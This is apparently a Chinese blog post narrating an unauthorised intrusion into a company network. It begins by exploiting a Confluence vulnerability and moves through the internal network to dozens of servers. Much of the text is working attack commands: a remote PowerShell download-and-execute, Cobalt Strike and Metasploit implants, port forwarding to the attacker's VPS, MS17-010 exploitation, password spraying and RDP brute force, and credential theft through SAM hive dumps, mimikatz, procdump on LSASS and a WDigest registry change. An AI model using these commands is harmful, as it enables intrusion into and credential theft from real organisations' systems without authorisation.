Confluence漏洞导致内网渗透漫游

首先说明,我是胡乱测试,也不是目标,而且不考虑管理员发现的问题。

0x01 发现目标#
那些日子爆发了这个Confluence漏洞,找了一个站测试下。

这个漏洞发现者已经在github和推特传了利用工具和poc.
微信截图_20211007174250.png
0x01 测试目标#
这个cve测试的时候需要一个匿名ftp,利用python自带的功能开启ftp。

python -m pyftpdlib

然后直接在vps开启匿名ftp。
微信截图_20211007174250.png

然后直接直接利用这个burp发包执行命令,可以看到执行成功。
微信截图_20211007174250.png
因为现在用cs比较多,可以简单看下目标环境,比如有没有杀毒,防护软件等等,免的马直接被杀。直接下载cs木马进去执行下。

微信截图_20211007174250.png

执行可以看到cs上线了。而且系统的system权限。
微信截图_20211007174250.png

可以看到是内网环境。因为这个是一个企业的wiki,一般都是企业的内网,不会是云服务器。
可以简单看下有没有域和当前的软件安装情况等等。

[hide]

net view && net time /domain
shell wmic product get name,version
或者直接用powershell脚本
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/3g

微信截图_20211007174250.png
1125图片_20211005184541.png
0211005184541.png
因为我的cs大范围探测会假死,上个msf马可以比较方便的探测。
微信截图_20211007174250.png
因为是server 2012 不能抓取明文,所以抓取下hash和添加一个路由

hashdump
run post/multi/manage/autoroute    post模块自动添加路由

微信截图_20211007174250.png
hash全部解不开。注册表更改了之后,然后等管理员上线,administrator系统最近是2017年,sysadmin倒是4天上了两次,坐等他下次上线,直接抓取明文。
而且没用域,只能横向渗透工作组,获取别的机器密码在返回来碰撞这个系统的账号密码。
首先肯定还是以ms17010漏洞为主,然后先扫描下445端口开放情况,看看有没有ms17010漏洞。然后msf模块直接扫描,直接可以节约点时间
微信截图_20211007174250.png
然后利用msf模块’smb_ms17_010’下开放这个端口存在ms17010的ip,2012需要一个最低权限的用户不好利用跳过,有一台08的机器。可以测试下。
没成功,报错了,就不截图了。
先用ew代理出来,然后本地来做内网测试。这样可以不用登录机器,但是ew不给力,一直出现问题,转发不出来。直接lcx直接转发进来。因为之前测试过,msf和cs在某些方面不如远控速度快。
请输入图片描述

lcx.exe -listen 110 34567
c:\windows\temp\lcx.exe -slave vps的ip 110 127.0.0.1 3389

请输入图片描述

c:\windows\temp\msscan\masscan -p445 10.99.0.0/16 >1099445.txt
c:\windows\temp\msscan\nmap -p445 --script smb-vuln-ms17-010 -iL 1099445.txt

直接利用k8老哥的zzz_exploit.exe ip然后目录把马改成ma.dat,03我测试都上线了。
请输入图片描述
因为这台有麦咖啡,getpass执行没有任何结果。mimikatz执行只能自己建立的用户,直接死在这里了。只能先暂时放在这里。
在翻wiki这台2012系统的时候发现zabbix agent,发现配置文件里有ip地址。是10.0的段。
请输入图片描述
接着用masscan扫描这个段。然后一样操作直接上线。
请输入图片描述
不能net和net1而且本地上传上去的也是不行的。那就直接抓取系统账号密码吧。
请输入图片描述
很顺利。就抓取了系统账号密码。虽然也有麦咖啡但是可以直接运行。。很神奇–。
请输入图片描述
还是用masscan扫描3389端口。然后进服务器翻了一波配置密码和抓的密码做了一个字典,爆破了一波有24台服务器。终于扩大了战果。
请输入图片描述
如果觉得这个动静太大,还可以利用bat脚本ipc探测密码正确也可以。还是很好用的,而且是cmd的。

for /f %i in (host.txt) do net use \\%i\admin$ /user:"administrator" "123456" && if %errorlevel% equ 0 ( echo %i >> c:\windows\temp\succeed.txt ) && net use \\%i\admin$ /del

随机进来几台服务器,因为2012很多,为了防止服务器杀毒抓取不了hash。用bat脚本导出。

@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive 
reg save hklm\security security.hive

上面保存为bat,然后会保存三个文件,直接利用python脚本提取hash

https://github.com/SecureAuthCorp/impacket
python secretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL

请输入图片描述
接下来就比较简单了,我们只要登录几台循环抓取密码,来扩充密码库就行了。 顺便看看战果哈哈。我以人格担保没有做tuoku操作,也没啥用这些数据。
请输入图片描述
请输入图片描述
请输入图片描述
请输入图片描述

svn备份系统

请输入图片描述
请输入图片描述
直接对收集出来的密码进行批量爆破1433端口(都是msscan扫描)。
请输入图片描述
发现跨网段的机器,然后直接sql server提权。报这个错的话,直接sql查询分离器直接执行就可以解决。
请输入图片描述
请输入图片描述
请输入图片描述

直接激活账号guest进去。

请输入图片描述
默认是3389端口。
请输入图片描述
怀疑防火墙的问题,因为我们只是要获取密码,不需要登录进去。而且这台机器是断网机。 不能下载马进去。
但是只需要本地搭建个http就行。内网出个web端口,下载抓取密码过去就行了。直接用绿色版的everying搭建就行。

certutil -urlcache -split -f http://10.0.4.2:801/QuarksPwDump.exe C:\Windows\Temp\QuarksPwDump.exe
C:\Windows\Temp\QuarksPwDump.exe -dhl

请输入图片描述
请输入图片描述
因为是2012抓取不了明文,当然也可以修改注册表。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

请输入图片描述
下次登录或者重启的时候我们就可以抓到密码。
然后上边上边已经拿到权限的不用再管了,对其它b段的机器就行提权。
在提权成功后,对系统接着循环抓取系统密码和hash。
然后接着把新的密码都添加到3389的爆破字典里面

直接抓取内存密码
C:\windows\temp\x64\procdump64.exe -accepteula -ma lsass.exe lsass.dmp
C:\windows\temp\x64\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit >C:\windows\temp\x64\lass.txt
mimikatz抓取密码
C:\windows\temp\x64\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit >C:\windows\temp\x64\mimikatz.txt
\QuarksPwDump工具抓取hash
C:\windows\temp\x64\QuarksPwDump.exe -dhl exit >C:\windows\temp\x64\systemhash.txt

装个逼。发现几台配置比较好的机器,哈哈
请输入图片描述
渗透到这里没结束,但是不想搞了,技术太菜。深入需要时间。也拿下了几十台服务器
请输入图片描述
好了,本来就是账号ban了,就不搞那么深入了。
172没咋测试,192B段,10A段。这个内网还是很大的。–可能闲着没事会在深入下吧。

[/hide]

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发